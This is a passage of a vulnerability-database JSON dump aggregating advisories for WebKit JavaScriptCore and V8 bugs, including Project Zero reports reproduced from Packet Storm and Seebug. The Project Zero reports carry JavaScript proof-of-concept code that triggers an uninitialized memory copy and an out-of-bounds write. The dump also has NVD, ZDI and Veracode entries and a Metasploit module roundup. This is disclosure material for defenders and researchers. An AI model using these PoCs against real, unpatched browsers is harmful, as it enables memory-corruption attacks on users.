\n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/150746/GS20181212044220.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-07-26T22:47:05", "description": "", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143479", "href": "https://packetstormsecurity.com/files/143479/WebKit-JSC-JSArray-appendMemcpy-Uninitialized-Memory-Copy.html", "sourceData": "` WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nCVE-2017-7064 \n \n \nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nHere's a snippet of JSArray::appendMemcpy. \n \nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray) \n{ \nauto scope = DECLARE_THROW_SCOPE(vm); \n \nif (!canFastCopy(vm, otherArray)) \nreturn false; \n \nIndexingType type = indexingType(); \nIndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType()); \nif (type == ArrayWithUndecided && copyType != NonArray) { \nif (copyType == ArrayWithInt32) \nconvertUndecidedToInt32(vm); \nelse if (copyType == ArrayWithDouble) \nconvertUndecidedToDouble(vm); \nelse if (copyType == ArrayWithContiguous) \nconvertUndecidedToContiguous(vm); \nelse { \nASSERT(copyType == ArrayWithUndecided); \nreturn true; \n} \n} else if (type != copyType) \nreturn false; \n \n... 
\n \nif (type == ArrayWithDouble) \nmemcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength); \nelse \nmemcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength); \n \nreturn true; \n} \n \nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data. \nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type. \n \nPoC: \nfunction optNewArrayAndConcat() { \nlet a = [,,,,,,,,,]; \nreturn Array.prototype.concat.apply(a); \n} \n \nfunction main() { \nArray.prototype.constructor = { \n[Symbol.species]: function () { \nreturn [{}]; \n} \n}; \n \ngc(); \n \nfor (let i = 0; i < 0x10000; i++) { \noptNewArrayAndConcat().fill({}); \n} \n \ngc(); \n \nfor (let i = 0; i < 0x20000; i++) { \nlet res = optNewArrayAndConcat(); \nif (res[0]) \nprint(res.toString()); \n} \n} \n \nmain(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. 
\n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/143479/GS20170725014549.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-05-26T05:54:17", "description": "", "cvss3": {}, "published": "2017-05-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC BindingNode::bindValue Failed Reference Count Increase", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-25T00:00:00", "id": "PACKETSTORM:142664", "href": "https://packetstormsecurity.com/files/142664/WebKit-JSC-BindingNode-bindValue-Failed-Reference-Count-Increase.html", "sourceData": "` WebKit: JSC: BindingNode::bindValue doesn't increase the scope's reference count \n \nCVE-2017-2505 \n \n \nHere's a snippet of BindingNode::bindValue. \n \nvoid BindingNode::bindValue(BytecodeGenerator& generator, RegisterID* value) const \n{ \n... \nRegisterID* scope = generator.emitResolveScope(nullptr, var); \ngenerator.emitExpressionInfo(divotEnd(), divotStart(), divotEnd()); \nif (m_bindingContext == AssignmentContext::AssignmentExpression) \ngenerator.emitTDZCheckIfNecessary(var, nullptr, scope); \nif (isReadOnly) { \ngenerator.emitReadOnlyExceptionIfNeeded(var); \nreturn; \n} \ngenerator.emitPutToScope(scope, var, value, generator.isStrictMode() ? ThrowIfNotFound : DoNotThrowIfNotFound, initializationModeForAssignmentContext(m_bindingContext)); \ngenerator.emitProfileType(value, var, divotStart(), divotEnd()); \nif (m_bindingContext == AssignmentContext::DeclarationStatement || m_bindingContext == AssignmentContext::ConstDeclarationStatement) \ngenerator.liftTDZCheckIfPossible(var); \n... \n} \n \nThat method uses |scope| without increasing its reference count. Thus, in |emitTDZCheckIfNecessary|, same |RegisterID| might be used. 
\n \nGenerated opcode of the PoC: \n[ 124] resolve_scope loc13, loc3, a(@id4), <ClosureVar>, 0, 0x62d00011f1a0 \n[ 131] get_from_scope loc13, loc13, a(@id4), 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, 0 predicting None \n[ 139] op_check_tdz loc13 \n[ 141] put_to_scope loc13, a(@id4), loc12, 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, <structure>, 0 \n \nAt 131, loc13 which points the scope is overwritten with |a|. \nAt 141, |a| is used as a scope, and it causes OOB write. \n \nPoC: \n(function () { \nlet a = { \nget val() { \n[...{a = 1.45}] = []; \na.val.x; \n}, \n}; \n \na.val; \n})(); \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/142664/GS20170526052003.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T14:37:38", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-11-14T15:29:00", "type": "cve", "title": "CVE-2018-17463", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:redhat:linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:redhat:linux_workstation:6.0", "cpe:/o:redhat:linux_desktop:6.0"], "id": "CVE-2018-17463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_server:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T17:36:28", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. 
This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "cve", "title": "CVE-2018-4438", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-05T15:48:00", "cpe": [], "id": "CVE-2018-4438", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-24T00:44:02", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. 
Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T18:15:00", "type": "cve", "title": "CVE-2019-8518", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-8518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T17:27:34", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2018-4122", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "CVE-2018-4122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:31:09", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. The issue involves the \"WebKit\" component. 
It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-07-20T16:29:00", "type": "cve", "title": "CVE-2017-7064", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2019-05-10T19:19:00", "cpe": ["cpe:/a:apple:itunes:12.6.1", "cpe:/o:apple:iphone_os:10.3.2", "cpe:/a:apple:icloud:6.2.1", "cpe:/a:apple:safari:10.1.1"], "id": "CVE-2017-7064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apple:icloud:6.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:itunes:12.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:23", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-22T05:29:00", "type": "cve", "title": "CVE-2017-2505", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2019-03-21T21:46:00", "cpe": [], "id": "CVE-2017-2505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "veracode": [{"lastseen": "2022-07-26T13:29:11", "description": "webkitgtk is vulnerable to arbitrary code execution. 
Multiple memory corruption issues allow for arbitrary code execution when processing malicious web content.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-03T07:38:06", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2022-04-19T18:45:51", "id": "VERACODE:29237", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29237/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T21:53:37", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of JIT. By performing actions in JavaScript, an attacker can trigger a type confusion condition. 
An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-06T00:00:00", "type": "zdi", "title": "Apple Safari Spread Operator Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-06T00:00:00", "id": "ZDI-18-271", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-271/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:56:46", "description": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of `JSArray::appendMemcpy`.\r\n```\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == 
ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n```\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\n### PoC:\r\n```\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n```", "cvss3": {}, "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy(CVE-2017-7064)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96302", "id": "SSV:96302", "sourceData": "\n function optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return 
Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96302", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T11:57:48", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.\r\n\r\nHere's a snippet of BindingNode::bindValue.\r\n```\r\nvoid BindingNode::bindValue(BytecodeGenerator& generator, RegisterID* value) const\r\n{\r\n ...\r\n RegisterID* scope = generator.emitResolveScope(nullptr, var);\r\n generator.emitExpressionInfo(divotEnd(), divotStart(), divotEnd());\r\n if (m_bindingContext == AssignmentContext::AssignmentExpression)\r\n generator.emitTDZCheckIfNecessary(var, nullptr, scope);\r\n if (isReadOnly) {\r\n generator.emitReadOnlyExceptionIfNeeded(var);\r\n return;\r\n }\r\n generator.emitPutToScope(scope, var, value, generator.isStrictMode() ? 
ThrowIfNotFound : DoNotThrowIfNotFound, initializationModeForAssignmentContext(m_bindingContext));\r\n generator.emitProfileType(value, var, divotStart(), divotEnd());\r\n if (m_bindingContext == AssignmentContext::DeclarationStatement || m_bindingContext == AssignmentContext::ConstDeclarationStatement)\r\n generator.liftTDZCheckIfPossible(var);\r\n ...\r\n}\r\n```\r\nThat method uses |scope| without increasing its reference count. Thus, in |emitTDZCheckIfNecessary|, same |RegisterID| might be used.\r\n\r\n### Generated opcode of the PoC:\r\n```\r\n[ 124] resolve_scope loc13, loc3, a(@id4), <ClosureVar>, 0, 0x62d00011f1a0\r\n[ 131] get_from_scope loc13, loc13, a(@id4), 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, 0 predicting None\r\n[ 139] op_check_tdz loc13\r\n[ 141] put_to_scope loc13, a(@id4), loc12, 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, <structure>, 0\r\n```\r\nAt 131, loc13 which points the scope is overwritten with |a|.\r\nAt 141, |a| is used as a scope, and it causes OOB write.\r\n\r\n### PoC:\r\n```\r\n(function () {\r\n let a = {\r\n get val() {\r\n [...{a = 1.45}] = [];\r\n a.val.x;\r\n },\r\n };\r\n\r\n a.val;\r\n})();\r\n```", "cvss3": {}, "published": "2017-05-26T00:00:00", "type": "seebug", "title": "WebKit: JSC: BindingNode::bindValue doesn't increase the scope's reference count(CVE-2017-2505)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93145", "id": "SSV:93145", "sourceData": "\n (function () {\r\n let a = {\r\n get val() {\r\n [...{a = 1.45}] = [];\r\n a.val.x;\r\n },\r\n };\r\n\r\n a.val;\r\n})();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93145", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "rapid7blog": [{"lastseen": "2020-10-28T04:47:53", "description": "\n\nMetasploit keeping that developer awareness rate up.\n\n\n\nThanks to 
[mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the server's config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onto solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by 
[piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and 